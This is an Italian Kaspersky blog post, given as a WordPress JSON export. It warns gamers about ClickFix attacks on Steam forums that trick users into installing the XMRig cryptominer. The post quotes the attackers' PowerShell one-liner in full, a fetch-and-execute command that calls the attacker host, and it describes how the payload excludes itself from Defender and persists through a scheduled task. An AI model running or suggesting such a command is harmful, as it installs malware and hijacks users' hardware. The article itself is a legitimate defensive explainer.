{"id":30941,"date":"2026-08-24T16:49:23","date_gmt":"2026-08-24T14:49:23","guid":{"rendered":"https:\/\/www.kaspersky.it\/blog\/?p=30941"},"modified":"2026-08-24T16:49:23","modified_gmt":"2026-08-24T14:49:23","slug":"steam-forum-clickfix-attack-irm-iex","status":"publish","type":"post","link":"https:\/\/www.kaspersky.it\/blog\/steam-forum-clickfix-attack-irm-iex\/30941\/","title":{"rendered":"Cattivi consigli per i giocatori: ClickFix colpisce i forum di Steam"},"content":{"rendered":"<p>Quest\u2019anno si \u00e8 assistito a un vero boom di <a href=\"https:\/\/www.kaspersky.com\/blog\/what-is-clickfix\/53348\/\" target=\"_blank\" rel=\"noopener nofollow\">attacchi ClickFix<\/a>. Ha cos\u00ec tanto successo tra i criminali che non facciamo nemmeno in tempo a finire di scrivere di una variazione che \u00e8 gi\u00e0 ora di passare alla successiva.<\/p>\n<p>Questa volta gli aggressori prendono di mira i giocatori: alcuni giornalisti specializzati in tecnologia <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/steam-forum-clickfix-attacks-infect-gamers-with-xmrig-cryptominers\/\" target=\"_blank\" rel=\"noopener nofollow\">hanno individuato dei post che diffondevano suggerimenti dannosi<\/a> nei forum di Steam. Ecco come si presentano questi post, quali malware vengono utilizzati per diffonderli e come proteggere il dispositivo.<\/p>\n<h2>ClickFix si fa strada nei forum di Steam<\/h2>\n<p>Molti giocatori si rivolgono agli altri giocatori sui forum di Steam per chiedere aiuto e consigli su come superare una missione difficile, salire di livello, ottenere il bottino migliore o aggirare un bug. Ed \u00e8 proprio questa fiducia nei consigli della community che gli aggressori hanno deciso di sfruttare.<\/p>\n<p>L\u2019attacco inizia quando i criminali rispondono alla domanda di un utente in merito ad arresti anomali del gioco, articoli di inventario mancanti o altri problemi tecnici. Fingendosi utili per commentare, essi suggeriscono di aprire PowerShell come amministratore ed eseguire un comando che presumibilmente risolve il problema riscontrato dall\u2019utente.<\/p>\n<div id=\"attachment_30945\" style=\"width: 1329px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/89\/2026\/08\/24155627\/steam-forum-clickfix-attack-irm-iex-1.jpg\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-30945\" class=\"wp-image-30945 size-full\" title=\"Post di un utente malintenzionato in un forum di Steam\" src=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/89\/2026\/08\/24155627\/steam-forum-clickfix-attack-irm-iex-1.jpg\" alt=\"Post di un utente malintenzionato in un forum di Steam\" width=\"1319\" height=\"947\"><\/a><p id=\"caption-attachment-30945\" class=\"wp-caption-text\">Spacciando il proprio post per un consiglio sulla risoluzione dei problemi, l\u2019autore dell\u2019attacco suggerisce di avviare PowerShell come amministratore ed eseguire un comando che, all\u2019apparenza, risolve il problema dell\u2019utente. <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/steam-forum-clickfix-attacks-infect-gamers-with-xmrig-cryptominers\/\" target=\"_blank\" rel=\"nofollow noopener\"> Fonte <\/a><\/p><\/div>\n<p>Come potete immaginare, eseguire il comando non risolve nulla, ma non fa altro che aprire un nuovo vaso di Pandora. \u00c8 proprio questa l\u2019idea alla base di ClickFix: utilizzare l\u2019ingegneria sociale per indurre le vittime a compiere autonomamente azioni pericolose, fornendo al contempo ai truffatori ci\u00f2 di cui hanno bisogno per compromettere il dispositivo. In precedenza abbiamo trattato altri trucchi di ClickFix \u2014 CAPTCHA falsi, errori del browser fasulli e altro ancora \u2014 che si basano tutti sul fatto di indurre la vittima a eseguire autonomamente il comando dannoso. Potete leggere ulteriori informazioni sulle <a href=\"https:\/\/www.kaspersky.it\/blog\/clickfix-attack-variations\/30523\/\" target=\"_blank\" rel=\"noopener\">diverse varianti degli attacchi ClickFix<\/a> nel nostro post precedente.<\/p>\n<p>L\u2019astuzia nell\u2019utilizzare ClickFix sui forum di Steam sta nel fatto che l\u2019attacco potrebbe colpire non solo il giocatore che ha chiesto aiuto; anche molti altri giocatori che si imbattono nello stesso problema e trovano la risposta tramite una ricerca su Google potrebbero cadere nella trappola.<\/p>\n<h2>Una breve introduzione: cosa si nasconde davvero dietro il comando <em>irm <\/em>|<em> iex<\/em><\/h2>\n<p>Prima di approfondire in che modo gli hacker riescano effettivamente a indurre i giocatori a effettuare l\u2019installazione in questo modo, \u00e8 necessario fornire alcune nozioni tecniche di base. Allora, per cominciare, i post sui forum di Steam consigliano alle ignare potenziali vittime di eseguire il seguente comando in PowerShell:<\/p>\n<p><code> irm msfconfig.icu | iex <\/code><\/p>\n<p>A qualcuno che non ha familiarit\u00e0 con PowerShell, questa riga potrebbe sembrare piuttosto innocua: sembra che serva ad avviare MSConfig, l\u2019utilit\u00e0 di configurazione del sistema integrata di Windows, con alcuni parametri aggiuntivi.<\/p>\n<p>In realt\u00e0, per\u00f2, \u00e8 tutt\u2019altro che innocua. Analizziamo le operazioni effettivamente eseguite da ciascuna parte di questo comando:<\/p>\n<ol>\n<li><strong><em>irm<\/em><\/strong> \u00e8 l\u2019abbreviazione del comando di PowerShell integrato <em>Invoke-RestMethod<\/em>. Raggiunge l\u2019indirizzo Web specificato pi\u00f9 avanti nella riga e recupera i dati nella risposta.<\/li>\n<li><strong><em>icu<\/em><\/strong> \u00e8 quell\u2019indirizzo Web, non il nome di un file locale, come potrebbe sembrare a prima vista. Questo \u00e8 il server degli aggressori e risponde alla richiesta <strong><em>irm<\/em><\/strong> con uno script di PowerShell dannoso.<\/li>\n<li><strong><em>iex<\/em><\/strong> \u00e8 un altro comando di PowerShell integrato, <em>Invoke-Expression<\/em>. Prende tutto ci\u00f2 che <strong><em>irm<\/em><\/strong> riceve da tale indirizzo Web e lo esegue come codice di PowerShell.<\/li>\n<\/ol>\n<p>Una volta eseguita, questa riga di codice di PowerShell scarica uno script dal sito specificato e lo esegue immediatamente. Come ha giustamente <a href=\"https:\/\/www.reddit.com\/r\/PowerShell\/comments\/181l9lh\/what_is_irm_httpsmassgravedevget_iex\/\" target=\"_blank\" rel=\"noopener nofollow\">sottolineato<\/a> un utente di Reddit, \u00e8 possibile scoprire in tutta sicurezza quale codice verrebbe effettivamente scaricato sul proprio dispositivo \u2014 senza il rischio che venga eseguito \u2014 semplicemente eliminando la seconda parte, ovvero <strong><em>iex<\/em><\/strong>. Senza di essa, il comando scaricher\u00e0 semplicemente il contenuto dello script e lo stamper\u00e0 nella finestra di PowerShell, senza eseguirlo. Questo fornisce il codice completo e non oscurato che viene richiesto di eseguire nel dispositivo. Vediamo ora cosa questi gentili utenti del forum di Steam stanno effettivamente cercando di convincere i giocatori a installare sui propri computer.<\/p>\n<h2>Un crypto miner, non uno strumento di ottimizzazione<\/h2>\n<p>Gli aggressori hanno fatto il loro dovere: lo script di PowerShell scaricato dai relativi server imita in modo convincente un\u2019utilit\u00e0 di ottimizzazione di Windows. Una volta avviato, mostra all\u2019utente una serie di notifiche che promettono di eliminare i file temporanei, svuotare la cache DNS, aggiornare i driver, verificare la presenza di errori sul disco, disattivare le app di avvio non necessarie, eseguire una scansione del sistema alla ricerca di malware, riparare l\u2019immagine di Windows e verificare l\u2019integrit\u00e0 dei file di sistema.<\/p>\n<div id=\"attachment_30946\" style=\"width: 960px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/89\/2026\/08\/24155832\/steam-forum-clickfix-attack-irm-iex-2.jpg\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-30946\" class=\"wp-image-30946 size-full\" title=\"Falsa ottimizzazione di Windows in corso\" src=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/89\/2026\/08\/24155832\/steam-forum-clickfix-attack-irm-iex-2.jpg\" alt=\"Falsa ottimizzazione di Windows in corso \" width=\"950\" height=\"436\"><\/a><p id=\"caption-attachment-30946\" class=\"wp-caption-text\">Lo script visualizza una serie di messaggi relativi a varie operazioni di ottimizzazione fittizie per dare l\u2019impressione che stia eseguendo operazioni di manutenzione utili. <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/steam-forum-clickfix-attacks-infect-gamers-with-xmrig-cryptominers\/\" target=\"_blank\" rel=\"nofollow noopener\"> Fonte <\/a><\/p><\/div>\n<p>La vera attivit\u00e0, nel frattempo, avviene dietro le quinte. Lo script inizia controllando se \u00e8 in esecuzione con i privilegi di amministratore. In tal caso, crea una cartella di lavoro nascosta in <em>C:\\Windows\\Background<\/em> e la aggiunge all\u2019elenco di esclusioni di Microsoft Defender. Da quel momento in poi, tutti i file inseriti nella cartella cesseranno di essere scansionati dall\u2019antivirus integrato di Windows.<\/p>\n<p>Successivamente, lo script prepara il sistema per la fase successiva dell\u2019attacco e scarica un eseguibile dal server degli aggressori, salvandolo nella stessa cartella <em>C:\\Windows\\Background<\/em> con il nome legittimo <em>system.exe<\/em> .<\/p>\n<p>Il file scaricato \u00e8 <em>XMRig<\/em>, uno degli strumenti pi\u00f9 popolari per il mining della criptovaluta Monero. <em>XMRig<\/em> in s\u00e9 non \u00e8 un malware; \u00e8 uno strumento di mining open source legittimo. Il problema \u00e8 che gli aggressori lo installano nei computer delle vittime a loro insaputa. Una volta avviato, la potenza di calcolo del dispositivo viene dirottata per il mining di Monero, e la criptovaluta ottenuta finisce direttamente nelle mani dei criminali.<\/p>\n<p>Questo rende i computer dei giocatori dei bersagli particolarmente allettanti: i moderni PC da gaming sono dotati di CPU e GPU potenti, proprio il tipo di hardware ideale per il mining di criptovalute.<\/p>\n<p>Per assicurarsi che il malware sopravviva al riavvio, lo script crea anche una nuova attivit\u00e0 in Utilit\u00e0 di pianificazione di Windows: <em>XMRig-{nome computer}<\/em>. Da quel momento in poi, avvia automaticamente il crypto miner ogni volta che il sistema viene avviato.<\/p>\n<h2>Come proteggere il dispositivo da crypto miner e altri tipi di malware<\/h2>\n<p>Purtroppo, molti giocatori sono riluttanti a installare software di sicurezza \u2014 o a mantenerlo attivo \u2014 sui propri dispositivi. Il principale responsabile \u00e8 il mito persistente secondo cui \u201cun antivirus rallenta il gioco\u201d. Ne abbiamo gi\u00e0 parlato nel nostro blog, e i risultati hanno dimostrato che l\u2019esecuzione di un antivirus durante il gioco <a href=\"https:\/\/www.kaspersky.it\/blog\/tests-gamers-antiviruses\/27682\/\" target=\"_blank\" rel=\"noopener\">non comporta alcun calo significativo delle prestazioni<\/a>.<\/p>\n<p>Lo stesso non si pu\u00f2 dire per i crypto miner, tuttavia: compromettono decisamente le prestazioni e consumano l\u2019hardware pi\u00f9 velocemente all\u2019avvio. Quindi cosa \u00e8 possibile fare per tenere il PC da gioco e gli account fuori pericolo?<\/p>\n<ul>\n<li>Evitate di eseguire script di PowerShell, Terminale o altri prompt dei comandi che sconosciuti suggeriscono di copiare ed eseguire, sia che si tratti di forum, chat o commenti.<\/li>\n<li>Prima di premere <em>Invio<\/em> per qualsiasi comando che non si comprende completamente, cercare di capire di cosa si tratta e quali sono le potenziali ricadute derivanti dall\u2019esecuzione.<\/li>\n<li>Utilizzare un <strong><a href=\"https:\/\/www.kaspersky.it\/premium?icid=it_bb2023-kdplacehd_acq_ona_smm__onl_b2c_kdaily_lnk_sm-team___kprem___\" target=\"_blank\" rel=\"noopener\">soluzione di protezione affidabile con una modalit\u00e0 di gioco<\/a><\/strong>\u00a0che segnaler\u00e0 per tempo i tentativi di download del malware e ne bloccher\u00e0 l\u2019esecuzione.<\/li>\n<li>Non disattivare la <strong><a href=\"https:\/\/www.kaspersky.it\/premium?icid=it_bb2023-kdplacehd_acq_ona_smm__onl_b2c_kdaily_lnk_sm-team___kprem___\" target=\"_blank\" rel=\"noopener\">protezione<\/a><\/strong>\u00a0mentre si gioca. L\u2019utilizzo di una soluzione con una modalit\u00e0 di gioco dedicata \u00e8 la strada da percorrere. <strong><a href=\"https:\/\/www.kaspersky.it\/home-security?icid=it_kdailyplacehold_acq_ona_smm__onl_b2c_blo_lnk_sm-team______\" target=\"_blank\" rel=\"noopener\">I prodotti di sicurezza Kaspersky<\/a><\/strong>\u00a0attivano automaticamente questa modalit\u00e0 non appena viene avviato un gioco, sospendendo gli aggiornamenti del database antivirus, le notifiche e le scansioni del disco pianificate fino al termine della partita.<\/li>\n<\/ul>\n<blockquote><p>Ti interessa sapere in quali altri modi gli hacker prendono di mira i giocatori? Dai un\u2019occhiata ai nostri altri post:<\/p>\n<ul>\n<li><a href=\"https:\/\/www.kaspersky.com\/blog\/windows-stealer-stealka\/55058\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Stealka Stealer: il nuovo volto dei trucchi, delle mod e dei crack per i videogiochi<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/www.kaspersky.com\/blog\/update-unity-games-cve-2025-59489\/54542\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Vulnerabilit\u00e0 nel motore di gioco Unity<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/www.kaspersky.com\/blog\/gamer-malware-endgame-gear-steam-minecraft\/54336\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Giocatori sotto tiro: malware nei siti Web ufficiali<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/www.kaspersky.com\/blog\/arcane-stealer-instead-of-cheats-for-minecraft\/53178\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Arcane Stealer al posto dei trucchi di Minecraft<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/www.kaspersky.it\/blog\/games-with-trojans-in-steam\/29467\/\" target=\"_blank\" rel=\"noopener\"><strong>Attenzione, gamer: i trojan hanno invaso Steam<\/strong><\/a><\/li>\n<\/ul>\n<\/blockquote>\n<input type=\"hidden\" class=\"category_for_banner\" value=\"premium-gamer\">\n","protected":false},"excerpt":{"rendered":"<p>I forum di Steam sono l&#8217;ultimo campo di battaglia per gli attacchi ClickFix. Analizziamo il modo in cui gli aggressori si fingono utili commentatori per indurre i giocatori a installare un crypto miner nei propri PC.<\/p>\n","protected":false},"author":2726,"featured_media":30942,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[2641],"tags":[3907,3036,3958,1843,1045,816,874,22,3957,1841,23],"class_list":["post-30941","post","type-post","status-publish","format-standard","has-post-thumbnail","category-threats","tag-clickfix","tag-criptovalute","tag-crypto-miner","tag-gamer","tag-giocatori","tag-giochi","tag-ingegneria-sociale","tag-malware-2","tag-powershell","tag-steam","tag-windows"],"hreflang":[{"hreflang":"it","url":"https:\/\/www.kaspersky.it\/blog\/steam-forum-clickfix-attack-irm-iex\/30941\/"},{"hreflang":"en-in","url":"https:\/\/www.kaspersky.co.in\/blog\/steam-forum-clickfix-attack-irm-iex\/30986\/"},{"hreflang":"en-ae","url":"https:\/\/me-en.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/26013\/"},{"hreflang":"en-gb","url":"https:\/\/www.kaspersky.co.uk\/blog\/steam-forum-clickfix-attack-irm-iex\/30815\/"},{"hreflang":"ru","url":"https:\/\/www.kaspersky.ru\/blog\/steam-forum-clickfix-attack-irm-iex\/42526\/"},{"hreflang":"x-default","url":"https:\/\/www.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/56285\/"},{"hreflang":"fr","url":"https:\/\/www.kaspersky.fr\/blog\/steam-forum-clickfix-attack-irm-iex\/24214\/"},{"hreflang":"ru-kz","url":"https:\/\/blog.kaspersky.kz\/steam-forum-clickfix-attack-irm-iex\/30952\/"},{"hreflang":"en-au","url":"https:\/\/www.kaspersky.com.au\/blog\/steam-forum-clickfix-attack-irm-iex\/36479\/"},{"hreflang":"en-za","url":"https:\/\/www.kaspersky.co.za\/blog\/steam-forum-clickfix-attack-irm-iex\/36393\/"}],"acf":[],"banners":"","maintag":{"url":"https:\/\/www.kaspersky.it\/blog\/tag\/gamer\/","name":"gamer"},"_links":{"self":[{"href":"https:\/\/www.kaspersky.it\/blog\/wp-json\/wp\/v2\/posts\/30941","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.kaspersky.it\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.kaspersky.it\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.kaspersky.it\/blog\/wp-json\/wp\/v2\/users\/2726"}],"replies":[{"embeddable":true,"href":"https:\/\/www.kaspersky.it\/blog\/wp-json\/wp\/v2\/comments?post=30941"}],"version-history":[{"count":3,"href":"https:\/\/www.kaspersky.it\/blog\/wp-json\/wp\/v2\/posts\/30941\/revisions"}],"predecessor-version":[{"id":30947,"href":"https:\/\/www.kaspersky.it\/blog\/wp-json\/wp\/v2\/posts\/30941\/revisions\/30947"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.kaspersky.it\/blog\/wp-json\/wp\/v2\/media\/30942"}],"wp:attachment":[{"href":"https:\/\/www.kaspersky.it\/blog\/wp-json\/wp\/v2\/media?parent=30941"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.kaspersky.it\/blog\/wp-json\/wp\/v2\/categories?post=30941"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.kaspersky.it\/blog\/wp-json\/wp\/v2\/tags?post=30941"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}